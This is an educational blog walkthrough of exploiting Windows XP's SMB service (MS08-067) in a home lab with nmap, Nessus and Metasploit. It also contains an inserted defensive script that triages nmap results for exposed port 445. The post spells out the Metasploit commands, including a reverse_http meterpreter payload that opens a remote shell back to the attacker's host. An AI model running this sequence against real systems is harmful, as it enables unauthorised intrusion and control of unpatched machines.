Tuesday, 2 April 2013
Exploit smb service in windows xp
In the previous chapter I talked about information gathering and service enumeration. Now let's go to the next level. This time I will write about my experiment on how to exploit one of the Windows services: the SMB service. I am still using BackTrack 5 R3 as the attacking toolkit and Windows XP installed in VirtualBox as the experiment lab.
Here are the steps to exploit a Windows XP system:
- information gathering, using nmap
- service enumeration and vulnerability assessment, using Nessus
- exploitation, using the Metasploit Framework
Now let's get started. First, boot Windows XP in VirtualBox and make sure BackTrack and Windows XP can reach each other using ping.
Next, do the information gathering using nmap, in the menu BackTrack > Information Gathering > Network Analysis > Network Scanners > nmap:
nmap -A 192.168.56.101
From nmap we get information about the OS version, services and open ports. I'll process this data to get more detailed information about the open ports using Nessus (if you can't find it in the BackTrack menu, you must install it and register a username first).
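The same nmap step seen from the defender's side, as an added example that is not part of the original post: nmap can write its results as XML with the `-oX` flag (for example `nmap -A -oX scan.xml 192.168.56.101`), and this script reads that file to list every host that exposes SMB on 445/tcp, marking Windows XP guesses as top priority for patching or isolation. The XML below is a constructed sample in nmap's output format, not a real scan.

```python
# Added example: triage nmap -oX output for hosts exposing SMB (445/tcp).
# Not code from the original post; the sample XML is constructed.
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX format (two hosts, one exposing SMB).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/>
        <service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2 or SP3" accuracy="100"/></os>
  </host>
  <host><status state="up"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/>
        <service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows 7" accuracy="90"/></os>
  </host>
</nmaprun>
"""


def smb_exposure(xml_text):
    """Return [(ip, os_guess, priority)] for live hosts with 445/tcp open."""
    findings = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") == "ipv4"), None)
        open_445 = any(
            p.get("protocol") == "tcp" and p.get("portid") == "445"
            and p.find("state").get("state") == "open"
            for p in host.findall("ports/port"))
        if not open_445:
            continue
        match = host.find("os/osmatch")  # nmap's best OS guess, if any
        os_guess = match.get("name") if match is not None else "unknown"
        # XP is end-of-life and the target of the post's SMB exploit.
        priority = "high" if "Windows XP" in os_guess else "review"
        findings.append((ip, os_guess, priority))
    return findings


if __name__ == "__main__":
    for ip, os_guess, prio in smb_exposure(SAMPLE_XML):
        print(f"{ip}\t{os_guess}\t{prio}")
```

Feed it a real `scan.xml` with `smb_exposure(open("scan.xml").read())` to get the list of hosts to firewall or patch first.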
Type 127.0.0.1:8834 in a web browser and log in with your account. After logging in, click the Scan menu and fill out the form:
name: anything you want
type: just choose Run Now to begin scanning immediately
policy: choose the policy matching your type of network
scan target: your target's address
target file: (optional)
Click Launch to begin the scan.
Wait a while, and after it completes click the result:
From the result we can see the vulnerabilities and their ranking from low through medium to high. Now we choose the service that has a high vulnerability; in this case it is port 445 with 2 high vulnerabilities.
We can see there are 2 services that have a high vulnerability, SMB and RPC. Click the SMB service for detailed information.
From the detailed information we can see that this service is highly vulnerable and can be exploited with Metasploit.
Now let's begin the penetration using Metasploit. In the menu BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
To search the exploit modules type: search platform:windows type:exploit osvdb:48153 path:exploit/windows/smb
Here are the results; just choose one ranked Great or Excellent. In this case I will use exploit/windows/smb/ms08_067_netapi.
To see the options needed type: show options.
RHOST is the target host; set it to the target IP address by typing: set RHOST 192.168.56.101. To begin penetration we must choose a payload (the code that runs on the target once the exploit succeeds). There are plenty of payloads available and ready to use; just choose one of them.
To show all available payloads just type: show payloads.
In this case I will use the payload windows/meterpreter/reverse_http. To use it type: set payload windows/meterpreter/reverse_http.
Metasploit will then require LHOST; just type: set LHOST 192.168.56.1 to use your own IP address as the LHOST.
To begin the exploitation just type exploit and hit enter. If successful, the meterpreter shell will appear.
To make sure that you have successfully entered the system type: sysinfo
And voila! The system is successfully penetrated and ready to be controlled.
To end the exploitation session just type exit and hit enter.